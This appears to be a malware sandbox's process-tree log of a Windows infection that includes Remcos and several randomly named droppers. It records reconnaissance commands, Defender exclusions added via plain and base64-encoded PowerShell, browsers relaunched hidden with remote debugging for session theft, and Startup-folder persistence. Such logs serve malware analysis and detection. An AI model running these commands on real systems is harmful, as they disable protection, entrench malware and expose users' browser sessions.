C:\Windows\system32\net.exe

net localgroup administrators

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup administrators

C:\Users\Admin\AppData\Local\Temp\Files\file.exe

"C:\Users\Admin\AppData\Local\Temp\Files\file.exe"

C:\Windows\system32\net.exe

net user guest

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user guest

C:\Windows\system32\net.exe

net user administrator

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user administrator

C:\ProgramData\tst\remcos.exe

"C:\ProgramData\tst\remcos.exe"

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\System32\Wbem\WMIC.exe

wmic startup get caption,command

C:\Windows\system32\tasklist.exe

tasklist /svc

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\system32\ROUTE.EXE

route print

C:\Windows\system32\ARP.EXE

arp -a

C:\Windows\system32\NETSTAT.EXE

netstat -ano

C:\Windows\system32\sc.exe

sc query type= service state= all

C:\Windows\system32\netsh.exe

netsh firewall show state

C:\Windows\system32\netsh.exe

netsh firewall show config

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\Files\main.exe

"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"

C:\Users\Admin\AppData\Local\Temp\Files\main.exe

"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"

C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe

"C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffd2eebcc40,0x7ffd2eebcc4c,0x7ffd2eebcc58

C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe

"C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1840,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1836 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1896,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=1992,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2012 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe

"C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2832,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2852 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2864,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2900 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Users\Admin\AppData\Local\Temp\Files\inlandsPom.exe

"C:\Users\Admin\AppData\Local\Temp\Files\inlandsPom.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe'; Add-MpPreference -ExclusionProcess 'wefhrf'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe

"C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\Files\zq6a1iqg.exe

"C:\Users\Admin\AppData\Local\Temp\Files\zq6a1iqg.exe"

C:\Users\Admin\AppData\Local\Temp\Files\file1.exe

"C:\Users\Admin\AppData\Local\Temp\Files\file1.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd2dd146f8,0x7ffd2dd14708,0x7ffd2dd14718

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2384 -ip 2384

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 560

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2384 -ip 2384

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --no-sandbox --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2088 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2168 /prefetch:3

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2384 -ip 2384

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --mojo-platform-channel-handle=2524 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2384 -ip 2384

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2384 -ip 2384

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 928

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2384 -ip 2384

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2384 -ip 2384

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 1120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2384 -ip 2384

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 1128

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2384 -ip 2384

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 1196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4384 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe

"C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2384 -ip 2384

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 1220

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwATwBwAGQAeABkAHkAZQB1AGwALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwATwBwAGQAeABkAHkAZQB1AGwALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAFkAagBsAHcAdQB1AHkAcwAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABZAGoAbAB3AHUAdQB5AHMALgBlAHgAZQA=

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 560

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 584

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 688

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 764

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 836

C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 852

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 896

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 956

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1164

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1048

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1456

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1464

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1132

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\ProgramData\axaso\bkujn.exe

C:\ProgramData\axaso\bkujn.exe

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 7612 -ip 7612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7612 -s 440

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

"Powershell" Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe'

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\ProgramData\axaso\bkujn.exe

"C:\ProgramData\axaso\bkujn.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\2863614952.exe

C:\Users\Admin\AppData\Local\Temp\2863614952.exe

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\sysnldcvmr.exe

C:\Users\Admin\sysnldcvmr.exe

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\ProgramData\axaso\bkujn.exe

C:\ProgramData\axaso\bkujn.exe

C:\Users\Admin\AppData\Local\Temp\1599224382.exe

C:\Users\Admin\AppData\Local\Temp\1599224382.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 9076 -ip 9076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 9076 -s 440

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\system32\schtasks.exe

schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Users\Admin\AppData\Local\Temp\1549524169.exe

C:\Users\Admin\AppData\Local\Temp\1549524169.exe

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\ProgramData\axaso\bkujn.exe

"C:\ProgramData\axaso\bkujn.exe"

C:\Users\Admin\AppData\Local\Temp\1094014616.exe

C:\Users\Admin\AppData\Local\Temp\1094014616.exe

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\32903688.exe

C:\Users\Admin\AppData\Local\Temp\32903688.exe

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1480

C:\Windows\System32\Wbem\wmic.exe

